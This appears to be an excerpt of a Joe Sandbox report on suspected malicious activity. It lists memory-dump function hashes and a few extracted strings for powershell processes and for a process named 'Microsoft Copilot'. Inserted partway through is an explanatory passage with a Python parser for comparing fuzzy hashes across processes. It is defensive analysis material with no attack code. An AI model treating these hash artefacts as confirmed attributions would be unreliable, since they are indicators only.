                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_16_2_7ffaaca2d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6d5048639ba4b3381bb1f5458927114b35d29df434777fa2d037e081ece03077
                                                                                      • Instruction ID: 1fd9fe4b9cdee9a13fd4f96c10f49e80b7d3708217b1f8ddb9a7e3249e7919d7
                                                                                      • Opcode Fuzzy Hash: 6d5048639ba4b3381bb1f5458927114b35d29df434777fa2d037e081ece03077
                                                                                      • Instruction Fuzzy Hash: 6FE01A30629D09CFDA94EB69C085D2537E2FB59300B204468E05ECB261E634F882CBC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6c86f600f741c21971d5ce77b03abcaec1416eae83c0757e2340acbd7b8a7fc3
                                                                                      • Instruction ID: e7471efb9f7ac3e7af01fe76352392d2b7cdefeaa9e83332e8ff544257fd8494
                                                                                      • Opcode Fuzzy Hash: 6c86f600f741c21971d5ce77b03abcaec1416eae83c0757e2340acbd7b8a7fc3
                                                                                      • Instruction Fuzzy Hash: 70C148B290EA8A9FF7959F6898155B97BE0FF56310B0441BEE84DC70D3DA18E809C3D1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 34e38235cbc72bf02ac54a4fac0e3ee3dd0637b832fc5d1134743d7fa82f62f9
                                                                                      • Instruction ID: e40b3f20f87791e62c32474cf16f989df336a36134544bcd5f42b402c1312f5e
                                                                                      • Opcode Fuzzy Hash: 34e38235cbc72bf02ac54a4fac0e3ee3dd0637b832fc5d1134743d7fa82f62f9
                                                                                      • Instruction Fuzzy Hash: 2FB1F762A0EB869FE396DB2858555657FE1DF97220B0941FBD08DC71A3DE18DC0AC3C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d8df4d85ead4dc1d98a8a0da1aea7eb9e5ecf2e1a2912124284a2ccfccc24fea
                                                                                      • Instruction ID: a43a36f5452300291d2f8eeb4c421ef265bfbd44ed46cde4d00ddaf1332af348
                                                                                      • Opcode Fuzzy Hash: d8df4d85ead4dc1d98a8a0da1aea7eb9e5ecf2e1a2912124284a2ccfccc24fea
                                                                                      • Instruction Fuzzy Hash: 1BB1487061CB898FE749DF1CC885AB5BBE1EF96311F10417ED08EC3696DA25E846CB81
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16bee2edb7a9060e5019be78fc5c499d684bcc335da79aa797d45765bf106032
                                                                                      • Instruction ID: 92adfc7bec70b42853cdff6cb21b92f643055a7175d96de6dc0a593911084566
                                                                                      • Opcode Fuzzy Hash: 16bee2edb7a9060e5019be78fc5c499d684bcc335da79aa797d45765bf106032
                                                                                      • Instruction Fuzzy Hash: 8F413672A0EA499FF7E5DB68A4159B57BD1EF82220B0804FED14DC7493EE14EC0883C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb944fae3d2c799e85a77e704d66ffc6baf1ef6a1e5dcb1e474dad9735e97a0b
                                                                                      • Instruction ID: d163291018374c92a17fa1e611278f50c35e47a9ee5b96acb72eca08430e23ff
                                                                                      • Opcode Fuzzy Hash: fb944fae3d2c799e85a77e704d66ffc6baf1ef6a1e5dcb1e474dad9735e97a0b
                                                                                      • Instruction Fuzzy Hash: 5D310B7191CB488FDB1C9F5CE84A6A97BE1FBA5310F00412FE449C3692DB71A815CBC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1641069543.00007FFAACA1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaaca1d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
                                                                                      • Instruction ID: 8130c5c7afc345f995467b02e306c123f3a8befeb5e535505f60d6cd35eddce9
                                                                                      • Opcode Fuzzy Hash: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
                                                                                      • Instruction Fuzzy Hash: 1241283040EBC49FE756CB29A8459623FF1EF57320B1545EFD088CB1A3D625E84AC792
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2d2c3f3a643c8b397b6b8f6ebfa13a8a9edfc518eaca3a58dd8548f6f216a88
                                                                                      • Instruction ID: 44dc53fb7b3930cf50e7c0cf5f02de6d8d2e4980c8d792e3dbd683f1b30d1dc1
                                                                                      • Opcode Fuzzy Hash: b2d2c3f3a643c8b397b6b8f6ebfa13a8a9edfc518eaca3a58dd8548f6f216a88
                                                                                      • Instruction Fuzzy Hash: FC413866D1D58ACEDB025F5DE8580E77BA0FF1771AF0403B2C4699A093FB294858C3DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8cbfcf4ee70c692b205beac28290fcb0fb8b0facac498b1f250956b247f26de1
                                                                                      • Instruction ID: 4e1625a1fa8dc5aaf949b54d7c699ffcd29063879fad480b827f90518e9d431b
                                                                                      • Opcode Fuzzy Hash: 8cbfcf4ee70c692b205beac28290fcb0fb8b0facac498b1f250956b247f26de1
                                                                                      • Instruction Fuzzy Hash: 1821267290FA87AFF7E5DF1C855557666D2EF52210B5980BAC14EC71E3CE28EC098381
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1643159267.00007FFAACC00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacc00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66bb725437f2014f525daa58aeda3ec69e93c3cdb0210d62c0ef6bce5c5fc7a6
                                                                                      • Instruction ID: ccd0ce82dffa9cbc81d11d08af04c5446f9848a00ada3d3d43129436ee3ed973
                                                                                      • Opcode Fuzzy Hash: 66bb725437f2014f525daa58aeda3ec69e93c3cdb0210d62c0ef6bce5c5fc7a6
                                                                                      • Instruction Fuzzy Hash: 0811323290E6899FF6E4EB6890559B97BD1EF02220B0854FAD14DC7493DE18EC088380
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.1642146125.00007FFAACB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB30000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_7ffaacb30000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction ID: 02d18d0c24301f623419d874371f47b8c87410a6690afa191d8220a6acbbcbba
                                                                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                      • Instruction Fuzzy Hash: A601677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC3691DB36E882CB45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d601b0e0bca03e3be11ff88b29fd35038c3582c70fa4c1d81b632d54910a1e8a
                                                                                      • Instruction ID: f67d2754a4086d9b6cfe77e4b1acb0e7a8955147a1904fa6697609f762d7cf06
                                                                                      • Opcode Fuzzy Hash: d601b0e0bca03e3be11ff88b29fd35038c3582c70fa4c1d81b632d54910a1e8a
                                                                                      • Instruction Fuzzy Hash: 9ED19D30A18A5DCFEB85DF58C445AA9BBE1FF69300F14816AD40DD7296DB35E885CBC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 464e5bd0b2727c98576b993e4435d35583dfc915a64f840bc371f410d0cbfeb5
                                                                                      • Instruction ID: e8d487bb6b30cc6faa1755df68a9b5c718630038196bc781b1230567e069ef5f
                                                                                      • Opcode Fuzzy Hash: 464e5bd0b2727c98576b993e4435d35583dfc915a64f840bc371f410d0cbfeb5
                                                                                      • Instruction Fuzzy Hash: 1CD174A290EB9A9FF7559B6888155B97BE0EF16310B0841BFD84DC72D3DA19EC09C3C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2f2d16112ba9d7f9ef4aa97a0a62fff86fc7e95906920e81786fcd7a36c23ab
                                                                                      • Instruction ID: 7f0d27188b376d0d644c09876f788c2f803f9bf173501150399c1fa54ad2c272
                                                                                      • Opcode Fuzzy Hash: c2f2d16112ba9d7f9ef4aa97a0a62fff86fc7e95906920e81786fcd7a36c23ab
                                                                                      • Instruction Fuzzy Hash: C6513862A0DB968FF799D72CD4116B47BD2EF96210B1880BAC14DC7393DE26EC0987C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 812bb5805d0ddd81a4467beb6260af8e80124c08ff1c62fda10d0d62db499937
                                                                                      • Instruction ID: 0d7b31b872850d3f95d044e5d0c44b2207c599ec88e13a812361874f82287551
                                                                                      • Opcode Fuzzy Hash: 812bb5805d0ddd81a4467beb6260af8e80124c08ff1c62fda10d0d62db499937
                                                                                      • Instruction Fuzzy Hash: AB412662A0DB598FF795D72894159B57BD1EF42220B0884BAD18DC7293EE15EC1887C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ff8140a54260d0bf57d95b363b6e6e96bfb11c7413d6757d86743cf8596c79e
                                                                                      • Instruction ID: d848b7b4fb6d9905004d4c50f5bc53971d26cc0722124e6b1c58b1a18bdef037
                                                                                      • Opcode Fuzzy Hash: 1ff8140a54260d0bf57d95b363b6e6e96bfb11c7413d6757d86743cf8596c79e
                                                                                      • Instruction Fuzzy Hash: A331C87191CB488FEB189B5CE8466A97BE0FB59311F00826FE44DD3252DB71A855CBC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1854488473.00007FFAACA0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA0D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaaca0d000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
                                                                                      • Instruction ID: 685cd1749f6729b3663ecec6c8847f183d0af991f355cc834ae39927508013c2
                                                                                      • Opcode Fuzzy Hash: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
                                                                                      • Instruction Fuzzy Hash: 2341283141EBC45FE7968B28A8419623FF0EF57320B1546DFD08CCB1A3E625E84AC792
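The listing above is machine output, and the useful work is turning it into records you can pivot on. The parser below is an added example and is not Joe Sandbox's own code. It assumes only the shape visible in the listing: one "Source File" / "Snapshot File" pair per function followed by the ID and fuzzy-hash bullets. The meaning assigned to the dot-separated fields of the .sdmp name (process index, stage, base address, all hex) is an assumption, so the parser cross-checks it against the snapshot name, which repeats the same three values (0x10 = 16, 0x13 = 19, 0x15 = 21 for the three powershell processes here). The sample input is constructed from three records copied from this listing, and the position-wise hash comparison is a heuristic chosen for the example, not the tool's similarity metric.

```python
"""Parse the Joe Sandbox IDA-plugin function listing into records (added
example, not part of the report; .sdmp field meanings are assumptions)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample in the listing's shape, hashes copied from the report:
# one function each from process 16, 19 and 21 (the powershell instances).
SAMPLE = """\
Memory Dump Source
• Source File: 00000010.00000002.1468390937.00007FFAACC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC10000, based on PE: false
• Snapshot File: hcaresult_16_2_7ffaacc10000_powershell.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7048f56df81150d6148e7f06ac5578ea6d80fb06630de136df3cbe5ce78d60c3
• Instruction ID: 7bd15f55b6858989f5c35d16ea1d1a251b53d4b241fe3dbfe79a0f3b843c9b8d
• Opcode Fuzzy Hash: 7048f56df81150d6148e7f06ac5578ea6d80fb06630de136df3cbe5ce78d60c3
• Instruction Fuzzy Hash: F0F0B872A0D5488FE758EB1DE0468A877E0FF46320B4140B6E04DCB8A3CA26EC48C780
• Source File: 00000013.00000002.1641069543.00007FFAACA1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA1D000, based on PE: false
• Snapshot File: hcaresult_19_2_7ffaaca1d000_powershell.jbxd
• Opcode ID: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
• Instruction ID: 8130c5c7afc345f995467b02e306c123f3a8befeb5e535505f60d6cd35eddce9
• Opcode Fuzzy Hash: a7e2f812bf450b69d4bf6aaee9e651f8badf4a04ab324c444df3d5cbac52b9f1
• Instruction Fuzzy Hash: 1241283040EBC49FE756CB29A8459623FF1EF57320B1545EFD088CB1A3D625E84AC792
• Source File: 00000015.00000002.1854488473.00007FFAACA0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA0D000, based on PE: false
• Snapshot File: hcaresult_21_2_7ffaaca0d000_powershell.jbxd
• Opcode ID: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
• Instruction ID: 685cd1749f6729b3663ecec6c8847f183d0af991f355cc834ae39927508013c2
• Opcode Fuzzy Hash: dce87310edfe3d598fd2dd526abe7301ae03ff50a63223f10d910f6413a95e05
• Instruction Fuzzy Hash: 2341283141EBC45FE7968B28A8419623FF0EF57320B1546DFD08CCB1A3E625E84AC792
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_\w+\.jbxd$")
KEYS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
        "Opcode ID": "opcode_id", "Instruction ID": "instruction_id",
        "Opcode Fuzzy Hash": "opcode_fuzzy", "Instruction Fuzzy Hash": "instruction_fuzzy"}

@dataclass
class FunctionRecord:
    source_file: str
    process_index: int      # assumed: 1st dot-field of the .sdmp name (hex)
    stage: int              # assumed: 2nd dot-field (hex)
    base_address: int       # assumed: 4th dot-field (hex); equals the Offset shown
    snapshot_file: str
    api_id: Optional[str] = None
    string_id: Optional[str] = None
    api_string_id: Optional[str] = None
    opcode_id: Optional[str] = None
    instruction_id: Optional[str] = None
    opcode_fuzzy: Optional[str] = None
    instruction_fuzzy: Optional[str] = None

def parse_listing(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    pending: dict = {}
    for raw in text.splitlines():
        m = FIELD_RE.match(raw.strip())
        if not m:
            continue                      # headers such as "Memory Dump Source"
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
            fname = value.split(",")[0].strip()
            parts = fname.split(".")
            pending = {"source_file": fname, "process_index": int(parts[0], 16),
                       "stage": int(parts[1], 16), "base_address": int(parts[3], 16)}
        elif key == "Snapshot File":
            sm = SNAPSHOT_RE.match(value)
            if not sm or not pending:
                raise ValueError(f"unexpected snapshot line: {value}")
            # Cross-check the assumed .sdmp fields against the snapshot name,
            # which repeats process index (decimal), stage and base address.
            if (int(sm.group(1)), int(sm.group(2)), int(sm.group(3), 16)) != (
                    pending["process_index"], pending["stage"], pending["base_address"]):
                raise ValueError(f"dump/snapshot mismatch: {pending['source_file']} vs {value}")
            cur = FunctionRecord(snapshot_file=value, **pending)
            records.append(cur)
        elif cur is not None and key in KEYS:
            setattr(cur, KEYS[key], value or None)   # empty IDs become None
    return records

def matching_positions(a: Optional[str], b: Optional[str]) -> int:
    """Positions where two fuzzy-hash strings agree (0 if lengths differ).
    Position-wise agreement is an assumption for this example, not the tool's metric."""
    if not a or not b or len(a) != len(b):
        return 0
    return sum(x == y for x, y in zip(a, b))

def cross_process_candidates(records: List[FunctionRecord], min_ratio: float = 0.75):
    """Pairs from different process indexes whose instruction fuzzy hashes agree
    in at least min_ratio of positions: a routine recurring across the powershell instances."""
    out = []
    for i, a in enumerate(records):
        for b in records[i + 1:]:
            if a.process_index == b.process_index:
                continue
            n = matching_positions(a.instruction_fuzzy, b.instruction_fuzzy)
            if a.instruction_fuzzy and n >= min_ratio * len(a.instruction_fuzzy):
                out.append((a.process_index, b.process_index, n))
    return out
```

Running parse_listing(SAMPLE) yields three records with process indexes 16, 19 and 21; every API/String ID is None, so the opcode and instruction hashes are the only pivot. cross_process_candidates flags the process 19 / process 21 pair, whose instruction fuzzy hashes agree in 56 of 70 positions, while the process 16 function matches neither. A mismatch between the .sdmp fields and the snapshot name raises ValueError, which is the signal that the assumed field layout does not hold for a given report.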
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03a80e878156c9d83365ff56a30c3df53daf9213c5dc13b9032e835e4cd12b29
                                                                                      • Instruction ID: 36ac74012fc187f145aa54f2e43e34f5dafb1687c64f7cfc35a620117789e23e
                                                                                      • Opcode Fuzzy Hash: 03a80e878156c9d83365ff56a30c3df53daf9213c5dc13b9032e835e4cd12b29
                                                                                      • Instruction Fuzzy Hash: 8C21283090CB4C8FEB59DBACD84A7E97FE0EB96321F04416BD44CC3152DA759449CB92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7ca40330b995d96b054442f9a215af3456394f44ef8918295f768047f235317
                                                                                      • Instruction ID: cb33b1c26319100e127c0852f350386f9df3f71b5c9d41bf7373e225d51afbc3
                                                                                      • Opcode Fuzzy Hash: f7ca40330b995d96b054442f9a215af3456394f44ef8918295f768047f235317
                                                                                      • Instruction Fuzzy Hash: AD21366290EB978FF395DB2CC4555B46AC2EF52210B49C0BAC14DC73A2CE2ADC088BC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1861249284.00007FFAACBF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACBF0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacbf0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43b0b5c55b1beaaf0d8fe3bccdc957f10a835b40d82b2e510fcf89cdc1aa5a16
                                                                                      • Instruction ID: 66880f6c02e9ff3ce45cf4d190ed0a8381739157843cf4818df29a8d8e303d8a
                                                                                      • Opcode Fuzzy Hash: 43b0b5c55b1beaaf0d8fe3bccdc957f10a835b40d82b2e510fcf89cdc1aa5a16
                                                                                      • Instruction Fuzzy Hash: 3811363290E7998FF6A5D728D0549F47BD0EF0222070880F6D05DC7293DE1AEC088BC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb20000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: 11d66e6850bd6f8ec4bcad91ddbe9ab688b9d117742591c10d6e6c16f703269a
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: 9401677111CB0C8FD744EF0CE451AA6B7E0FB99364F10056DE58AC36A1DB36E882CB45
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000015.00000002.1860034143.00007FFAACB25000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB25000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_21_2_7ffaacb25000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: N_^5$N_^8$N_^F$N_^I$N_^K
                                                                                      • API String ID: 0-759930175
                                                                                      • Opcode ID: 23239d7b90cefc8b6c7613284b9219181e9ecf42c16bfb57a40dff7a504e192c
                                                                                      • Instruction ID: e054c49baf7f1426b7b016c4ccb94fb8c9b8173f4d3e12d18928218311c3c3eb
                                                                                      • Opcode Fuzzy Hash: 23239d7b90cefc8b6c7613284b9219181e9ecf42c16bfb57a40dff7a504e192c
                                                                                      • Instruction Fuzzy Hash: AD2125F7B151214B930137BEEC659D8B784DF9537534942B2D298CF523EE14608A8AC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 261d10dc314be433c33dd678d593e6a9102ea5502c0c64aaaee1e1ce011707e3
                                                                                      • Instruction ID: cf050de85ed77840e4313a5e0c47744f94ce30eaec0ffd29570f0d804f959bc1
                                                                                      • Opcode Fuzzy Hash: 261d10dc314be433c33dd678d593e6a9102ea5502c0c64aaaee1e1ce011707e3
                                                                                      • Instruction Fuzzy Hash: 9B22B770B18A598FE798F738C499679B6E2FF99304F44457DE40FC32E6DE29A8018781
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eba621ade819e9977f2345d042d476687e1698054709013cd84f5c20486640f3
                                                                                      • Instruction ID: 5fcc6cd37f37f7f96b6bb69995a0562704cc5a086d0b5aa6bc074acb96a25f10
                                                                                      • Opcode Fuzzy Hash: eba621ade819e9977f2345d042d476687e1698054709013cd84f5c20486640f3
                                                                                      • Instruction Fuzzy Hash: 1B7128A2A0D6960FE352B3BCE4595F96B95DF87324B0840BBD4CDCA0B3EE085847C395
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13b32a30086c97cde48eaedc3a02b751cd09095712027a9283d8234f1bb7c32e
                                                                                      • Instruction ID: 9120127bb7fdf3a0730fab0b4d1d3d0a1c5e67abef4b9c52c8dc9126f8f74fe3
                                                                                      • Opcode Fuzzy Hash: 13b32a30086c97cde48eaedc3a02b751cd09095712027a9283d8234f1bb7c32e
                                                                                      • Instruction Fuzzy Hash: A3512351A5E6C94FE786A77888246767FE9DF87219B0804FEE0CEC3193DD18584AC382
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_28_2_7ffaacb50000_Microsoft Copilot.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ;L_$<L_^
                                                                                      • API String ID: 0-636787459
                                                                                      • Opcode ID: e9bfe4fb85025c56bc8c759d666d7d11313c5490cafb1a4bf871f3cb37a35ea7
                                                                                      • Instruction ID: b28ab22c11f039c4b391e9870bfe2b9a32cde0cbf5a30181727efe06c2353e0c
                                                                                      • Opcode Fuzzy Hash: e9bfe4fb85025c56bc8c759d666d7d11313c5490cafb1a4bf871f3cb37a35ea7
                                                                                      • Instruction Fuzzy Hash: C94109B1A092198FD344FBACE4958E97BB2EF85314744447AD84C872ABEF386445C794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000001C.00000002.1940786579.00007FFAACB50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACB50000, based on PE: false
